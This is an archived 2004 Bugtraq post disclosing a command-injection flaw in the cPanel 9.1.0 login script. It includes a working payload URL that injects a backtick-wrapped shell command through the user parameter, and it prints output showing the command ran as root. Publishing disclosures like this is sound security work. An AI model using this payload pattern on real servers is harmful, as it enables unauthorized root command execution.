[34117] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Cpanel 9.1.0 have a problem ?

daemon@ATHENA.MIT.EDU (Arab VieruZ)
Fri Mar 12 14:21:11 2004

Date: 12 Mar 2004 18:00:28 -0000
Message-ID: <20040312180028.26227.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Arab VieruZ <arabviersus@hotmail.com>
To: bugtraq@securityfocus.com



Hi all 

I found another problem in login script

http://www.xxx.com:2082/login/?user=|"`id`"|

it same the first it give ROOT & u can use "+" or "%20" without any problem :) ! lool

look @ this:


/*
sh: /var/cpanel/users/: is a directory sh: uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel): command not
found HTTP/1.0 401 Still Working Connection: close Set-Cookie: cprelogin=no;
path=/ Server: cpsrvd/9.1.0 Content-type: text/html
*/

uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Thanx

Arab VieruZ
Saudi Devilz Team

SAUDI ARABIA KSA :)


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[34117] in bugtraq

Cpanel 9.1.0 have a problem ?

daemon@ATHENA.MIT.EDU (Arab VieruZ)Fri Mar 12 14:21:11 2004

daemon@ATHENA.MIT.EDU (Arab VieruZ)
Fri Mar 12 14:21:11 2004